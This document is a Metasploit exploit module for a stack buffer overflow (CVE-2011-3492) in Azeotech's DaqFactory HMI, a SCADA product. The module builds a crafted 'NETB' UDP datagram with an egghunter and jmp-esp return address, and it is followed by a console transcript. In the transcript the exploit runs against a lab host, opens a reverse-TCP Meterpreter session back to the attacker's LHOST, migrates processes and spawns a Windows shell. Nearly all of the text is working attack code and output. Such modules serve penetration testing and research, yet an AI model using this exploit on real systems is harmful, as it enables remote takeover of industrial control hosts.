
DaqFactory HMI NETB request stack buffer overflow vulnerability
##
# $Id: daq_factory_bof.rb 13766 2011-09-20 18:56:21Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Metasploit exploit module for the DaqFactory 'NETB' request stack overflow
# (CVE-2011-3492 / OSVDB 75496, see 'References' below).
#
# Runtime behaviour, as visible in #exploit: the module sends exactly one UDP
# datagram to RPORT and then blocks in the payload handler; nothing is ever read
# back from the service, so success is only observable through a session
# arriving at the handler. The datagram always begins with "NETB", is built
# almost entirely from uppercase ASCII letters, and sums to a fixed 0x400 bytes
# (see the length note in #exploit) -- the properties a network detection would
# key on.
class Metasploit3 < Msf::Exploit::Remote
        Rank = GoodRanking

        # Udp supplies connect_udp / udp_sock / disconnect_udp; Egghunter supplies
        # generate_egghunter, which is why the payload below is delivered as a
        # small hunter stub plus a tagged egg rather than inline.
        include Msf::Exploit::Remote::Udp
        include Msf::Exploit::Remote::Egghunter

        # Registers module metadata, the single hard-coded target and the options.
        #
        # @param info [Hash] metadata merged into this module by update_info
        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'DaqFactory HMI NETB Request Overflow',
                        'Description'    => %q{
                                        This module exploits a stack buffer overflow in Azeotech's DaqFactory
                                product. The specfic vulnerability is triggered when sending a specially crafted
                                'NETB' request to port 20034. Exploitation of this vulnerability may take a few
                                seconds due to the use of egghunter.  This vulnerability was one of the 14
                                releases discovered by researcher Luigi Auriemma.
                        },
                        'Author'         =>
                                [
                                        'Luigi Auriemma',  # Initial discovery, crash poc
                                        'mr_me <steventhomasseeley[at]gmail.com>',  # msf exploit
                                ],

                        'Version'        => '$Revision: 13766 $',
                        'References'     =>
                                [
                                        [ 'CVE', '2011-3492'],
                                        [ 'OSVDB', '75496'],
                                        [ 'URL', 'http://aluigi.altervista.org/adv/daqfactory_1-adv.txt'],
                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                        # Runs 'migrate -f' as soon as a session opens, so the
                                        # session leaves the DAQFactory.exe process on its own.
                                        'InitialAutoRunScript' => 'migrate -f',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 600,
                                        'BadChars' => "\x00",
                                },
                        'Platform'       => 'win',
                        'Targets'        =>
                                [
                                        [
                                                'DAQFactory Pro 5.85 Build 1853 on Windows XP SP3',
                                                {
                                                        # Single fixed return address; no other target
                                                        # or build is handled by this module.
                                                        'Ret' => 0x100B9EDF,  # jmp esp PEGRP32A.dll
                                                        # Base distance used by #exploit to size the
                                                        # trailing filler; corrected there by the DHCP length.
                                                        'Offset' => 636,
                                                }
                                        ],
                                ],
                        'DisclosureDate' => 'Sep 13 2011',
                        'DefaultTarget'  => 0))

                register_options(
                        [
                                # Required for EIP offset
                                # Only the *length* of this string is used (in #exploit); the
                                # address itself is never placed in the datagram.
                                # NOTE(review): the option is marked required but defaults to "",
                                # which #exploit would treat as a length of 0 -- whether the
                                # framework's option validation rejects the empty default is
                                # not visible from this file.
                                OptString.new('DHCP', [ true, "The DHCP server IP of the target", "" ]),
                                Opt::RPORT(20034)
                        ], self.class)
        end

        # Builds the malformed NETB datagram, sends it once and waits on the handler.
        #
        # Datagram layout, in the order it is appended below:
        #   "NETB" | 233 alpha | "\x00" | <offset> alpha | 2 nops | hunter |
        #   (50 - hunter.length) alpha | Ret (4) | 12 alpha | short jmp (2) |
        #   egg | (finaloffset - egg.length) alpha
        # Every variable-length field is paired with filler that compensates for
        # it, so the total is 308 + offset + finaloffset bytes regardless of the
        # payload or egghunter sizes; see the note at the offset arithmetic.
        #
        # @return [void]
        def exploit
                connect_udp

                print_status("Trying target #{target.name}...")

                # No checksum on the egg; 'scar' is the tag the hunter stub scans for.
                eggoptions ={
                        :checksum => false,
                        :eggtag => 'scar',
                }

                # Correct the offset according to the 2nd IP (DHCP) length
                # With the default "" iplen is 0 and offset is 93.
                iplen = datastore['DHCP'].length
                offset = 93-iplen

                # Both branches are algebraically the same expression,
                #   finaloffset = target['Offset'] + 80 - offset   (716 - offset here),
                # so offset + finaloffset is the constant 716 and the datagram is
                # always 308 + 716 = 1024 = 0x400 bytes, matching the advisory bound
                # noted further down. Because offset is an Integer, the elsif is the
                # exact complement of the if and acts as a plain else; neither
                # pktoffset nor finaloffset can be left unassigned.
                if offset >= 80
                        pktoffset = offset - 80
                        finaloffset = target['Offset']-pktoffset
                elsif offset <= 79
                        pktoffset = 80 - offset
                        finaloffset = target['Offset']+pktoffset
                end

                # springboard onto our unmodified payload
                # A relative near jump is prepended to the encoded payload; the
                # combined buffer becomes the egg that the hunter locates in memory.
                p = Rex::Arch::X86.jmp(750) + payload.encoded
                hunter,egg = generate_egghunter(p, payload_badchars, eggoptions)

                sploit  = "NETB"  # NETB request overflow
                sploit << rand_text_alpha_upper(233)
                sploit << "\x00"  # part of the packet structure
                sploit << rand_text_alpha_upper(offset)  # include the offset for the DHCP address
                sploit << make_nops(2)
                sploit << hunter
                # Filler sized so that nops + hunter + filler is always 52 bytes.
                # NOTE(review): assumes hunter.length <= 50; a longer stub would make
                # this count negative -- confirm against generate_egghunter's output.
                sploit << rand_text_alpha_upper(52-hunter.length-2)
                sploit << [target.ret].pack("V")
                sploit << rand_text_alpha_upper(12)
                sploit << Rex::Arch::X86.jmp_short(-70)
                sploit << egg
                # packetlen needs to be adjusted to a max of 0x400 as per advisory
                # Trailing filler absorbs the egg's length so the total stays at 0x400.
                sploit << rand_text_alpha_upper(finaloffset-egg.length)

                # The use of rand_text_alpha_upper() ensures we always get the same length for the
                # first IP address. See the following for more details:
                # http://dev.metasploit.com/redmine/issues/5453
                # Replaces bytes 12..15 (inside the 233-byte alpha field that follows
                # "NETB") with four fresh uppercase letters; the length is unchanged.
                sploit[12,4] = rand_text_alpha_upper(4)

                # Single datagram, no response is read.
                udp_sock.put(sploit)

                # Block on the payload handler, then release the UDP socket.
                handler
                disconnect_udp
        end

end
Example usage (console transcript):
mr_me@neptune daq_factory]$ msfconsole -r daq.rc

IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|`.""'.
  II     6.     .P  :  .' / |  `.  :
  II     'T;. .;P'  '.'  /  |    `.'
  II      'T; ;P'    `. /   |    .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 743 exploits - 374 auxiliary - 81 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
       =[ svn r13720 updated 3 days ago (2011.09.12)

resource (daq.rc)> use exploit/windows/scada/daq_factory_bof
resource (daq.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (daq.rc)> set RHOST 192.168.114.130
RHOST => 192.168.114.130
resource (daq.rc)> set LHOST 192.168.114.1
LHOST => 192.168.114.1
resource (daq.rc)> set LPORT 4444
LPORT => 4444
resource (daq.rc)> exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.114.1:4444
[*] Trying target Windows universal...
msf  exploit(daq_factory_bof) >
[*] Sending stage (752128 bytes) to 192.168.114.130
[*] Meterpreter session 1 opened (192.168.114.1:4444 -> 192.168.114.130:1186) at 2011-09-15 02:40:24 +1000
[*] Session ID 1 (192.168.114.1:4444 -> 192.168.114.130:1186) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: DAQFactory.exe (2112)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 1664

msf  exploit(daq_factory_bof) > sessions -l

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  STEVE-ABF32F2B7\Administrator @ STEVE-ABF32F2B7  192.168.114.1:4444 -> 192.168.114.130:1186

msf  exploit(daq_factory_bof) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 3116 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\DAQFactory>